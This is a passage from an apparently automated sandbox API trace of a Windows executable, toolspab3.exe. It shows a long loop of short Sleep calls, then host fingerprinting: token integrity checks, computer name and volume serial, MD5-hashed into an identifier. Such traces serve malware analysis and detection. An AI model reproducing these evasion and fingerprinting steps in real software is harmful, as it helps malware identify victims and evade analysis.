(dwMilliseconds=0xa) [0134.862] Sleep (dwMilliseconds=0xa) [0134.916] Sleep (dwMilliseconds=0xa) [0135.009] Sleep (dwMilliseconds=0xa) [0135.087] Sleep (dwMilliseconds=0xa) [0135.133] Sleep (dwMilliseconds=0xa) [0135.228] Sleep (dwMilliseconds=0xa) [0135.363] Sleep (dwMilliseconds=0xa) [0135.418] Sleep (dwMilliseconds=0xa) [0135.437] Sleep (dwMilliseconds=0xa) [0135.462] Sleep (dwMilliseconds=0xa) [0135.484] Sleep (dwMilliseconds=0xa) [0135.511] Sleep (dwMilliseconds=0xa) [0135.574] Sleep (dwMilliseconds=0xa) [0135.717] Sleep (dwMilliseconds=0xa) [0135.764] Sleep (dwMilliseconds=0xa) [0135.797] Sleep (dwMilliseconds=0xa) [0135.840] Sleep (dwMilliseconds=0xa) [0135.856] Sleep (dwMilliseconds=0xa) [0135.901] Sleep (dwMilliseconds=0xa) [0135.935] Sleep (dwMilliseconds=0xa) [0135.948] Sleep (dwMilliseconds=0xa) [0135.963] Sleep (dwMilliseconds=0xa) [0136.043] Sleep (dwMilliseconds=0xa) [0136.121] Sleep (dwMilliseconds=0xa) [0136.194] Sleep (dwMilliseconds=0xa) [0136.249] Sleep (dwMilliseconds=0xa) [0136.325] Sleep (dwMilliseconds=0xa) [0136.357] Sleep (dwMilliseconds=0xa) [0136.373] Sleep (dwMilliseconds=0xa) [0136.411] Sleep (dwMilliseconds=0xa) [0136.447] Sleep (dwMilliseconds=0xa) [0136.497] Sleep (dwMilliseconds=0xa) [0136.604] Sleep (dwMilliseconds=0xa) [0136.637] Sleep (dwMilliseconds=0xa) [0136.651] Sleep (dwMilliseconds=0xa) [0136.666] Sleep (dwMilliseconds=0xa) [0136.734] Sleep (dwMilliseconds=0xa) [0136.821] Sleep (dwMilliseconds=0xa) [0136.891] Sleep (dwMilliseconds=0xa) [0136.946] Sleep (dwMilliseconds=0xa) [0136.962] Sleep (dwMilliseconds=0xa) [0136.981] Sleep (dwMilliseconds=0xa) [0136.994] Sleep (dwMilliseconds=0xa) [0137.042] Sleep (dwMilliseconds=0xa) [0137.074] Sleep (dwMilliseconds=0xa) [0137.100] Sleep (dwMilliseconds=0xa) [0137.150] Sleep (dwMilliseconds=0xa) [0137.384] Sleep (dwMilliseconds=0xa) [0137.488] Sleep (dwMilliseconds=0xa) [0137.533] Sleep (dwMilliseconds=0xa) [0137.557] Sleep (dwMilliseconds=0xa) [0137.572] Sleep (dwMilliseconds=0xa) [0137.590] Sleep (dwMilliseconds=0xa) [0137.611] Sleep (dwMilliseconds=0xa) [0137.696] Sleep (dwMilliseconds=0xa) [0137.757] Sleep (dwMilliseconds=0xa) [0137.826] Sleep (dwMilliseconds=0xa) [0137.858] Sleep (dwMilliseconds=0xa) [0137.931] Sleep (dwMilliseconds=0xa) [0137.977] Sleep (dwMilliseconds=0xa) [0137.994] Sleep (dwMilliseconds=0xa) [0138.010] Sleep (dwMilliseconds=0xa) [0138.034] Sleep (dwMilliseconds=0xa) [0138.081] Sleep (dwMilliseconds=0xa) [0138.120] Sleep (dwMilliseconds=0xa) [0138.245] Sleep (dwMilliseconds=0xa) [0138.346] Sleep (dwMilliseconds=0xa) [0138.493] Sleep (dwMilliseconds=0xa) [0138.520] Sleep (dwMilliseconds=0xa) [0138.561] Sleep (dwMilliseconds=0xa) [0138.603] Sleep (dwMilliseconds=0xa) [0138.648] Sleep (dwMilliseconds=0xa) [0138.666] Sleep (dwMilliseconds=0xa) [0138.680] Sleep (dwMilliseconds=0xa) [0138.702] Sleep (dwMilliseconds=0xa) [0138.727] Sleep (dwMilliseconds=0xa) [0138.779] Sleep (dwMilliseconds=0xa) [0138.855] Sleep (dwMilliseconds=0xa) [0138.931] Sleep (dwMilliseconds=0xa) [0138.996] Sleep (dwMilliseconds=0xa) [0139.067] Sleep (dwMilliseconds=0xa) [0139.095] Sleep (dwMilliseconds=0xa) [0139.117] Sleep (dwMilliseconds=0xa) [0139.136] Sleep (dwMilliseconds=0xa) [0139.151] Sleep (dwMilliseconds=0xa) [0139.171] Sleep (dwMilliseconds=0xa) [0139.241] Sleep (dwMilliseconds=0xa) [0139.320] Sleep (dwMilliseconds=0xa) [0139.402] Sleep (dwMilliseconds=0xa) [0139.416] Sleep (dwMilliseconds=0xa) [0139.430] Sleep (dwMilliseconds=0xa) [0139.477] Sleep (dwMilliseconds=0xa) [0139.502] Sleep (dwMilliseconds=0xa) [0139.523] Sleep (dwMilliseconds=0xa) [0139.540] Sleep (dwMilliseconds=0xa) [0139.588] Sleep (dwMilliseconds=0xa) [0139.635] Sleep (dwMilliseconds=0xa) [0139.775] Sleep (dwMilliseconds=0xa) [0139.805] Sleep (dwMilliseconds=0xa) [0139.820] Sleep (dwMilliseconds=0xa) [0139.838] Sleep (dwMilliseconds=0xa) [0139.853] Sleep (dwMilliseconds=0xa) [0139.882] Sleep (dwMilliseconds=0xa) [0139.930] Sleep (dwMilliseconds=0xa) [0140.030] Sleep (dwMilliseconds=0xa) [0140.191] Sleep (dwMilliseconds=0xa) [0140.250] Sleep (dwMilliseconds=0xa) [0140.291] Sleep (dwMilliseconds=0xa) [0140.305] Sleep (dwMilliseconds=0xa) [0140.321] Sleep (dwMilliseconds=0xa) [0140.337] Sleep (dwMilliseconds=0xa) [0140.352] Sleep (dwMilliseconds=0xa) [0140.415] Sleep (dwMilliseconds=0xa) [0140.539] Sleep (dwMilliseconds=0xa) [0140.581] Sleep (dwMilliseconds=0xa) [0140.680] Sleep (dwMilliseconds=0xa) [0140.822] Sleep (dwMilliseconds=0xa) [0140.885] Sleep (dwMilliseconds=0xa) [0140.909] Sleep (dwMilliseconds=0xa) [0140.939] Sleep (dwMilliseconds=0xa) [0141.056] Sleep (dwMilliseconds=0xa) [0141.108] Sleep (dwMilliseconds=0xa) [0141.134] Sleep (dwMilliseconds=0xa) [0141.149] Sleep (dwMilliseconds=0xa) [0141.164] Sleep (dwMilliseconds=0xa) [0141.186] Sleep (dwMilliseconds=0xa) [0141.291] Sleep (dwMilliseconds=0xa) [0141.354] Sleep (dwMilliseconds=0xa) [0141.465] Sleep (dwMilliseconds=0xa) [0141.509] Sleep (dwMilliseconds=0xa) [0141.532] Sleep (dwMilliseconds=0xa) [0141.557] Sleep (dwMilliseconds=0xa) [0141.580] Sleep (dwMilliseconds=0xa) [0141.617] Sleep (dwMilliseconds=0xa) [0141.726] Sleep (dwMilliseconds=0xa) [0141.791] Sleep (dwMilliseconds=0xa) [0141.811] Sleep (dwMilliseconds=0xa) [0141.838] Sleep (dwMilliseconds=0xa) [0141.852] Sleep (dwMilliseconds=0xa) [0141.868] Sleep (dwMilliseconds=0xa) [0141.914] Sleep (dwMilliseconds=0xa) [0142.054] Sleep (dwMilliseconds=0xa) [0142.086] Sleep (dwMilliseconds=0xa) [0142.133] Sleep (dwMilliseconds=0xa) [0142.182] Sleep (dwMilliseconds=0xa) [0142.235] Sleep (dwMilliseconds=0xa) [0142.274] Sleep (dwMilliseconds=0xa) [0142.322] Sleep (dwMilliseconds=0xa) [0142.375] Sleep (dwMilliseconds=0xa) [0142.481] Sleep (dwMilliseconds=0xa) [0142.542] Sleep (dwMilliseconds=0xa) [0142.555] Sleep (dwMilliseconds=0xa) [0142.572] Sleep (dwMilliseconds=0xa) [0142.597] Sleep (dwMilliseconds=0xa) [0142.664] Sleep (dwMilliseconds=0xa) [0142.696] Sleep (dwMilliseconds=0xa) [0142.712] Sleep (dwMilliseconds=0xa) [0142.734] Sleep (dwMilliseconds=0xa) [0142.782] Sleep (dwMilliseconds=0xa) [0142.866] Sleep (dwMilliseconds=0xa) [0142.970] Sleep (dwMilliseconds=0xa) [0142.992] Sleep (dwMilliseconds=0xa) [0143.004] Sleep (dwMilliseconds=0xa) [0143.021] Sleep (dwMilliseconds=0xa) [0143.037] Sleep (dwMilliseconds=0xa) [0143.067] Sleep (dwMilliseconds=0xa) [0143.193] Sleep (dwMilliseconds=0xa) [0143.260] Sleep (dwMilliseconds=0xa) [0143.286] Sleep (dwMilliseconds=0xa) [0143.301] Sleep (dwMilliseconds=0xa) [0143.319] Sleep (dwMilliseconds=0xa) [0143.365] Sleep (dwMilliseconds=0xa) [0143.429] Sleep (dwMilliseconds=0xa) [0143.537] Sleep (dwMilliseconds=0xa) [0143.573] Sleep (dwMilliseconds=0xa) [0143.599] Sleep (dwMilliseconds=0xa) [0143.708] Sleep (dwMilliseconds=0xa) [0143.777] Sleep (dwMilliseconds=0xa) [0143.805] Sleep (dwMilliseconds=0xa) [0143.834] Sleep (dwMilliseconds=0xa) [0143.944] Sleep (dwMilliseconds=0xa) [0143.990] Sleep (dwMilliseconds=0xa) [0144.005] Sleep (dwMilliseconds=0xa) [0144.053] Sleep (dwMilliseconds=0xa) [0144.067] Sleep (dwMilliseconds=0xa) [0144.084] Sleep (dwMilliseconds=0xa) [0144.099] Sleep (dwMilliseconds=0xa) [0144.113] Sleep (dwMilliseconds=0xa) [0144.177] Sleep (dwMilliseconds=0xa) [0144.194] Sleep (dwMilliseconds=0xa) [0144.207] Sleep (dwMilliseconds=0xa) [0144.232] Sleep (dwMilliseconds=0xa) [0144.258] Sleep (dwMilliseconds=0xa) [0144.269] Sleep (dwMilliseconds=0xa) [0144.285] Sleep (dwMilliseconds=0xa) [0144.303] Sleep (dwMilliseconds=0xa) [0144.349] Sleep (dwMilliseconds=0xa) [0144.366] Sleep (dwMilliseconds=0xa) [0144.400] Sleep (dwMilliseconds=0xa) [0144.427] Sleep (dwMilliseconds=0xa) [0144.443] Sleep (dwMilliseconds=0xa) [0144.457] Sleep (dwMilliseconds=0xa) [0144.489] Sleep (dwMilliseconds=0xa) [0144.578] Sleep (dwMilliseconds=0xa) [0144.607] Sleep (dwMilliseconds=0xa) [0144.630] Sleep (dwMilliseconds=0xa) [0144.645] Sleep (dwMilliseconds=0xa) [0144.661] Sleep (dwMilliseconds=0xa) [0144.676] Sleep (dwMilliseconds=0xa) [0144.693] Sleep (dwMilliseconds=0xa) [0144.740] Sleep (dwMilliseconds=0xa) [0144.756] Sleep (dwMilliseconds=0xa) [0144.770] Sleep (dwMilliseconds=0xa) [0144.785] Sleep (dwMilliseconds=0xa) [0144.802] Sleep (dwMilliseconds=0xa) [0144.817] Sleep (dwMilliseconds=0xa) [0144.832] Sleep (dwMilliseconds=0xa) [0144.894] Sleep (dwMilliseconds=0xa) [0144.912] Sleep (dwMilliseconds=0xa) [0144.928] Sleep (dwMilliseconds=0xa) [0144.942] Sleep (dwMilliseconds=0xa) [0144.958] Sleep (dwMilliseconds=0xa) [0144.973] Sleep (dwMilliseconds=0xa) [0144.990] Sleep (dwMilliseconds=0xa) [0145.006] Sleep (dwMilliseconds=0xa) [0145.020] Sleep (dwMilliseconds=0xa) [0145.069] Sleep (dwMilliseconds=0xa) [0145.093] Sleep (dwMilliseconds=0xa) [0145.113] Sleep (dwMilliseconds=0xa) [0145.129] Sleep (dwMilliseconds=0xa) [0145.146] Sleep (dwMilliseconds=0xa) [0145.160] Sleep (dwMilliseconds=0xa) [0145.176] Sleep (dwMilliseconds=0xa) [0145.192] Sleep (dwMilliseconds=0xa) [0145.254] Sleep (dwMilliseconds=0xa) [0145.280] Sleep (dwMilliseconds=0xa) [0145.301] Sleep (dwMilliseconds=0xa) [0145.318] Sleep (dwMilliseconds=0xa) [0145.335] Sleep (dwMilliseconds=0xa) [0145.348] Sleep (dwMilliseconds=0xa) [0145.365] Sleep (dwMilliseconds=0xa) [0145.444] Sleep (dwMilliseconds=0xa) [0145.457] Sleep (dwMilliseconds=0xa) [0145.486] Sleep (dwMilliseconds=0xa) [0145.537] Sleep (dwMilliseconds=0xa) [0145.551] Sleep (dwMilliseconds=0xa) [0145.567] Sleep (dwMilliseconds=0xa) [0145.615] Sleep (dwMilliseconds=0xa) [0145.642] Sleep (dwMilliseconds=0xa) [0145.663] Sleep (dwMilliseconds=0xa) [0145.676] Sleep (dwMilliseconds=0xa) [0145.692] Sleep (dwMilliseconds=0xa) [0145.708] Sleep (dwMilliseconds=0xa) [0145.723] Sleep (dwMilliseconds=0xa) [0145.739] Sleep (dwMilliseconds=0xa) [0145.755] Sleep (dwMilliseconds=0xa) [0145.802] Sleep (dwMilliseconds=0xa) [0145.817] Sleep (dwMilliseconds=0xa) [0145.832] Sleep (dwMilliseconds=0xa) [0145.848] Sleep (dwMilliseconds=0xa) [0145.864] Sleep (dwMilliseconds=0xa) [0145.880] Sleep (dwMilliseconds=0xa) [0145.895] Sleep (dwMilliseconds=0xa) [0145.912] Sleep (dwMilliseconds=0xa) [0145.930] Sleep (dwMilliseconds=0xa) [0145.974] Sleep (dwMilliseconds=0xa) [0145.989] Sleep (dwMilliseconds=0xa) [0146.004] Sleep (dwMilliseconds=0xa) [0146.021] Sleep (dwMilliseconds=0xa) [0146.035] Sleep (dwMilliseconds=0xa) [0146.052] Sleep (dwMilliseconds=0xa) [0146.067] Sleep (dwMilliseconds=0xa) [0146.083] Sleep (dwMilliseconds=0xa) [0146.098] Sleep (dwMilliseconds=0xa) [0146.147] Sleep (dwMilliseconds=0xa) [0146.172] Sleep (dwMilliseconds=0xa) [0146.192] Sleep (dwMilliseconds=0xa) [0146.208] Sleep (dwMilliseconds=0xa) [0146.233] Sleep (dwMilliseconds=0xa) [0146.256] Sleep (dwMilliseconds=0xa) [0146.270] Sleep (dwMilliseconds=0xa) [0146.287] Sleep (dwMilliseconds=0xa) [0146.334] Sleep (dwMilliseconds=0xa) [0146.361] Sleep (dwMilliseconds=0xa) [0146.406] Sleep (dwMilliseconds=0xa) [0146.426] Sleep (dwMilliseconds=0xa) [0146.442] Sleep (dwMilliseconds=0xa) [0146.464] Sleep (dwMilliseconds=0xa) [0146.521] Sleep (dwMilliseconds=0xa) [0146.539] Sleep (dwMilliseconds=0xa) [0146.551] Sleep (dwMilliseconds=0xa) [0146.567] Sleep (dwMilliseconds=0xa) [0146.582] Sleep (dwMilliseconds=0xa) [0146.598] Sleep (dwMilliseconds=0xa) [0146.619] Sleep (dwMilliseconds=0xa) [0146.755] Sleep (dwMilliseconds=0xa) [0146.874] Sleep (dwMilliseconds=0xa) [0146.897] Sleep (dwMilliseconds=0xa) [0146.921] Sleep (dwMilliseconds=0xa) [0146.943] Sleep (dwMilliseconds=0xa) [0146.959] Sleep (dwMilliseconds=0xa) [0146.973] Sleep (dwMilliseconds=0xa) [0146.989] Sleep (dwMilliseconds=0xa) [0147.036] Sleep (dwMilliseconds=0xa) [0147.055] Sleep (dwMilliseconds=0xa) [0147.067] Sleep (dwMilliseconds=0xa) [0147.082] Sleep (dwMilliseconds=0xa) [0147.099] Sleep (dwMilliseconds=0xa) [0147.115] Sleep (dwMilliseconds=0xa) [0147.129] Sleep (dwMilliseconds=0xa) [0147.192] Sleep (dwMilliseconds=0xa) [0147.209] Sleep (dwMilliseconds=0xa) [0147.237] Sleep (dwMilliseconds=0xa) [0147.256] Sleep (dwMilliseconds=0xa) [0147.271] Sleep (dwMilliseconds=0xa) [0147.288] Sleep (dwMilliseconds=0xa) [0147.303] Sleep (dwMilliseconds=0xa) [0147.317] Sleep (dwMilliseconds=0xa) [0147.365] Sleep (dwMilliseconds=0xa) [0147.423] Sleep (dwMilliseconds=0xa) [0147.444] Sleep (dwMilliseconds=0xa) [0147.460] Sleep (dwMilliseconds=0xa) [0147.483] Sleep (dwMilliseconds=0xa) [0147.516] Sleep (dwMilliseconds=0xa) [0147.537] Sleep (dwMilliseconds=0xa) [0147.584] Sleep (dwMilliseconds=0xa) [0147.619] Sleep (dwMilliseconds=0xa) [0147.646] Sleep (dwMilliseconds=0xa) [0147.661] Sleep (dwMilliseconds=0xa) [0147.678] Sleep (dwMilliseconds=0xa) [0147.692] Sleep (dwMilliseconds=0xa) [0147.710] Sleep (dwMilliseconds=0xa) [0147.728] Sleep (dwMilliseconds=0xa) [0147.772] Sleep (dwMilliseconds=0xa) [0147.823] Sleep (dwMilliseconds=0xa) [0147.853] Sleep (dwMilliseconds=0xa) [0147.890] Sleep (dwMilliseconds=0xa) [0147.916] Sleep (dwMilliseconds=0xa) [0147.974] Sleep (dwMilliseconds=0xa) [0147.992] Sleep (dwMilliseconds=0xa) [0148.004] Sleep (dwMilliseconds=0xa) [0148.020] Sleep (dwMilliseconds=0xa) [0148.037] Sleep (dwMilliseconds=0xa) [0148.052] Sleep (dwMilliseconds=0xa) [0148.067] Sleep (dwMilliseconds=0xa) [0148.083] Sleep (dwMilliseconds=0xa) [0148.098] Sleep (dwMilliseconds=0xa) [0148.150] Sleep (dwMilliseconds=0xa) [0148.182] Sleep (dwMilliseconds=0xa) [0148.210] Sleep (dwMilliseconds=0xa) [0148.238] Sleep (dwMilliseconds=0xa) [0148.255] Sleep (dwMilliseconds=0xa) [0148.272] Sleep (dwMilliseconds=0xa) [0148.286] Sleep (dwMilliseconds=0xa) [0148.341] Sleep (dwMilliseconds=0xa) [0148.365] Sleep (dwMilliseconds=0xa) [0148.406] Sleep (dwMilliseconds=0xa) [0148.429] Sleep (dwMilliseconds=0xa) [0148.442] Sleep (dwMilliseconds=0xa) [0148.458] Sleep (dwMilliseconds=0xa) [0148.475] Sleep (dwMilliseconds=0xa) [0148.521] Sleep (dwMilliseconds=0xa) [0148.552] Sleep (dwMilliseconds=0xa) [0148.567] Sleep (dwMilliseconds=0xa) [0148.583] Sleep (dwMilliseconds=0xa) [0148.598] Sleep (dwMilliseconds=0xa) [0148.614] Sleep (dwMilliseconds=0xa) [0148.630] Sleep (dwMilliseconds=0xa) [0148.645] Sleep (dwMilliseconds=0xa) [0148.662] Sleep (dwMilliseconds=0xa) [0148.709] Sleep (dwMilliseconds=0xa) [0148.737] Sleep (dwMilliseconds=0xa) [0148.754] Sleep (dwMilliseconds=0xa) [0148.770] Sleep (dwMilliseconds=0xa) [0148.786] Sleep (dwMilliseconds=0xa) [0148.802] Sleep (dwMilliseconds=0xa) [0148.817] Sleep (dwMilliseconds=0xa) [0148.832] Sleep (dwMilliseconds=0xa) [0148.848] Sleep (dwMilliseconds=0xa) [0148.897] Sleep (dwMilliseconds=0xa) [0148.922] Sleep (dwMilliseconds=0xa) [0148.942] Sleep (dwMilliseconds=0xa) [0148.958] Sleep (dwMilliseconds=0xa) [0148.975] Sleep (dwMilliseconds=0xa) [0148.989] Sleep (dwMilliseconds=0xa) [0149.006] Sleep (dwMilliseconds=0xa) [0149.021] Sleep (dwMilliseconds=0xa) [0149.036] Sleep (dwMilliseconds=0xa) [0149.131] Sleep (dwMilliseconds=0xa) [0149.152] Sleep (dwMilliseconds=0xa) [0149.176] Sleep (dwMilliseconds=0xa) [0149.194] Sleep (dwMilliseconds=0xa) [0149.211] Sleep (dwMilliseconds=0xa) [0149.230] Sleep (dwMilliseconds=0xa) [0149.303] Sleep (dwMilliseconds=0xa) [0149.322] Sleep (dwMilliseconds=0xa) [0149.334] Sleep (dwMilliseconds=0xa) [0149.350] Sleep (dwMilliseconds=0xa) [0149.365] Sleep (dwMilliseconds=0xa) [0149.407] Sleep (dwMilliseconds=0xa) [0149.473] Sleep (dwMilliseconds=0xa) [0149.498] Sleep (dwMilliseconds=0xa) [0149.520] Sleep (dwMilliseconds=0xa) [0149.535] Sleep (dwMilliseconds=0xa) [0149.551] Sleep (dwMilliseconds=0xa) [0149.567] Sleep (dwMilliseconds=0xa) [0149.583] Sleep (dwMilliseconds=0xa) [0149.645] Sleep (dwMilliseconds=0xa) [0149.661] Sleep (dwMilliseconds=0xa) [0149.676] Sleep (dwMilliseconds=0xa) [0149.691] Sleep (dwMilliseconds=0xa) [0149.711] Sleep (dwMilliseconds=0xa) [0149.723] Sleep (dwMilliseconds=0xa) [0149.739] Sleep (dwMilliseconds=0xa) [0149.758] Sleep (dwMilliseconds=0xa) [0149.770] Sleep (dwMilliseconds=0xa) [0149.819] Sleep (dwMilliseconds=0xa) [0149.843] Sleep (dwMilliseconds=0xa) [0149.864] Sleep (dwMilliseconds=0xa) [0149.881] Sleep (dwMilliseconds=0xa) [0149.895] Sleep (dwMilliseconds=0xa) [0149.911] Sleep (dwMilliseconds=0xa) [0149.927] Sleep (dwMilliseconds=0xa) [0149.942] Sleep (dwMilliseconds=0xa) [0149.957] Sleep (dwMilliseconds=0xa) [0150.005] Sleep (dwMilliseconds=0xa) [0150.022] Sleep (dwMilliseconds=0xa) [0150.037] Sleep (dwMilliseconds=0xa) [0150.052] Sleep (dwMilliseconds=0xa) [0150.068] Sleep (dwMilliseconds=0xa) [0150.084] Sleep (dwMilliseconds=0xa) [0150.100] Sleep (dwMilliseconds=0xa) [0150.114] Sleep (dwMilliseconds=0xa) [0150.130] Sleep (dwMilliseconds=0xa) [0150.177] Sleep (dwMilliseconds=0xa) [0150.204] Sleep (dwMilliseconds=0xa) [0150.231] Sleep (dwMilliseconds=0xa) [0150.317] Sleep (dwMilliseconds=0xa) [0150.364] Sleep (dwMilliseconds=0xa) [0150.400] Sleep (dwMilliseconds=0xa) [0150.428] Sleep (dwMilliseconds=0xa) [0150.442] Sleep (dwMilliseconds=0xa) [0150.460] Sleep (dwMilliseconds=0xa) [0150.473] Sleep (dwMilliseconds=0xa) [0150.491] Sleep (dwMilliseconds=0xa) [0150.505] Sleep (dwMilliseconds=0xa) [0150.553] Sleep (dwMilliseconds=0xa) [0150.571] Sleep (dwMilliseconds=0xa) [0150.583] Sleep (dwMilliseconds=0xa) [0150.598] Sleep (dwMilliseconds=0xa) [0150.615] Sleep (dwMilliseconds=0xa) [0150.629] Sleep (dwMilliseconds=0xa) [0150.645] Sleep (dwMilliseconds=0xa) [0150.661] Sleep (dwMilliseconds=0xa) [0150.676] Sleep (dwMilliseconds=0xa) [0150.725] Sleep (dwMilliseconds=0xa) [0150.749] Sleep (dwMilliseconds=0xa) [0150.774] Sleep (dwMilliseconds=0xa) [0150.786] Sleep (dwMilliseconds=0xa) [0150.801] Sleep (dwMilliseconds=0xa) [0150.818] Sleep (dwMilliseconds=0xa) [0150.832] Sleep (dwMilliseconds=0xa) [0150.849] Sleep (dwMilliseconds=0xa) [0150.865] Sleep (dwMilliseconds=0xa) [0150.912] Sleep (dwMilliseconds=0xa) [0150.934] Sleep (dwMilliseconds=0xa) [0150.947] Sleep (dwMilliseconds=0xa) [0150.973] Sleep (dwMilliseconds=0xa) [0150.989] Sleep (dwMilliseconds=0xa) [0151.005] Sleep (dwMilliseconds=0xa) [0151.020] Sleep (dwMilliseconds=0xa) [0151.082] Sleep (dwMilliseconds=0xa) [0151.098] Sleep (dwMilliseconds=0xa) [0151.114] Sleep (dwMilliseconds=0xa) [0151.129] Sleep (dwMilliseconds=0xa) [0151.146] Sleep (dwMilliseconds=0xa) [0151.162] Sleep (dwMilliseconds=0xa) [0151.176] Sleep (dwMilliseconds=0xa) [0151.192] Sleep (dwMilliseconds=0xa) [0151.209] Sleep (dwMilliseconds=0xa) [0151.259] Sleep (dwMilliseconds=0xa) [0151.294] Sleep (dwMilliseconds=0xa) [0151.317] Sleep (dwMilliseconds=0xa) [0151.332] Sleep (dwMilliseconds=0xa) [0151.348] Sleep (dwMilliseconds=0xa) [0151.364] Sleep (dwMilliseconds=0xa) [0151.394] Sleep (dwMilliseconds=0xa) [0151.490] Sleep (dwMilliseconds=0xa) [0151.518] Sleep (dwMilliseconds=0xa) [0151.535] Sleep (dwMilliseconds=0xa) [0151.551] Sleep (dwMilliseconds=0xa) [0151.568] GetSystemDirectoryA (in: lpBuffer=0x10cdfde0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.568] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe" [0151.568] RtlGetVersion (in: lpVersionInformation=0x410457 | out: lpVersionInformation=0x410457*(dwOSVersionInfoSize=0x0, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0151.568] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x10cdfdc8 | out: TokenHandle=0x10cdfdc8*=0x202c) returned 1 [0151.568] GetTokenInformation (in: TokenHandle=0x202c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10cdfdc0 | out: TokenInformation=0x0, ReturnLength=0x10cdfdc0) returned 0 [0151.569] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x25) returned 0x440830 [0151.569] GetTokenInformation (in: TokenHandle=0x202c, TokenInformationClass=0x19, TokenInformation=0x440830, TokenInformationLength=0x1c, ReturnLength=0x10cdfdc0 | out: TokenInformation=0x440830, ReturnLength=0x10cdfdc0) returned 1 [0151.569] GetSidSubAuthorityCount (pSid=0x440840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x440841 [0151.569] GetSidSubAuthority (pSid=0x440840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x440848 [0151.569] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440830) returned 0x25 [0151.569] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x440830) returned 1 [0151.569] CloseHandle (hObject=0x202c) returned 1 [0151.569] GetComputerNameA (in: lpBuffer=0x10cdfe90, nSize=0x10cdfed0 | out: lpBuffer="XC64ZB", nSize=0x10cdfed0) returned 1 [0151.569] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x10cdfec0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x10cdfec0*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0151.570] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x29) returned 0x440830 [0151.570] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x14) returned 0x440870 [0151.570] wsprintfA (in: param_1=0x440830, param_2="%s%08X%08X" | out: param_1="XC64ZB99FC78690C287F38") returned 22 [0151.575] CryptAcquireContextA (in: phProv=0x10cdfe18, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x10cdfe18*=0x49c2710) returned 1 [0151.590] CryptCreateHash (in: hProv=0x49c2710, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x10cdfe10 | out: phHash=0x10cdfe10) returned 1 [0151.591] lstrlenA (lpString="XC64ZB99FC78690C287F38") returned 22 [0151.591] CryptHashData (hHash=0x4ccd890, pbData=0x440830, dwDataLen=0x16, dwFlags=0x0) returned 1 [0151.591] CryptGetHashParam (in: hHash=0x4ccd890, dwParam=0x2, pbData=0x10cdfe20, pdwDataLen=0x10cdfe50, dwFlags=0x0 | out: pbData=0x10cdfe20, pdwDataLen=0x10cdfe50) returned 1 [0151.591] wsprintfA (in: param_1=0x41020c, param_2="%02X" | out: param_1="FE") returned 2 [0151.591] wsprintfA (in: param_1=0x41020e, param_2="%02X" | out: param_1="7F") returned 2 [0151.591] wsprintfA (in: param_1=0x410210, param_2="%02X" | out: param_1="15") returned 2 [0151.591] wsprintfA (in: param_1=0x410212, param_2="%02X" | out: param_1="06") returned 2 [0151.591] wsprintfA (in: param_1=0x410214, param_2="%02X" | out: param_1="0B") returned 2 [0151.591] wsprintfA (in: param_1=0x410216, param_2="%02X" | out: param_1="87") returned 2 [0151.591] wsprintfA (in: param_1=0x410218, param_2="%02X" | out: param_1="5F") returned 2 [0151.591] wsprintfA (in: param_1=0x41021a, param_2="%02X" | out: param_1="B9") returned 2 [0151.591] wsprintfA (in: param_1=0x41021c, param_2="%02X" | out: param_1="FB") returned 2 [0151.591] wsprintfA (in: param_1=0x41021e, param_2="%02X" | out: param_1="2A") returned 2 [0151.591] wsprintfA (in: param_1=0x410220, param_2="%02X" | out: param_1="49") returned 2 [0151.591] wsprintfA (in: param_1=0x410222, param_2="%02X" | out: param_1="F0") returned 2 [0151.591] wsprintfA (in: param_1=0x410224, param_2="%02X" | out: param_1="8D") returned 2 [0151.591] wsprintfA (in: param_1=0x410226, param_2="%02X" | out: param_1="5D") returned 2 [0151.591] wsprintfA (in: param_1=0x410228, param_2="%02X" | out: param_1="03") returned 2 [0151.591] wsprintfA (in: param_1=0x41022a, param_2="%02X" | out: param_1="12") returned 2 [0151.591] CryptDestroyHash (hHash=0x4ccd890) returned 1 [0151.591] CryptReleaseContext (hProv=0x49c2710, dwFlags=0x0) returned 1 [0151.591] wsprintfA (in: param_1=0x41022c, param_2="%08X" | out: param_1="0C287F38") returned 8 [0151.591] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440870) returned 0x14 [0151.591] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x440870) returned 1 [0151.591] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440830) returned 0x29 [0151.592] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x440830) returned 1 [0151.592] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, 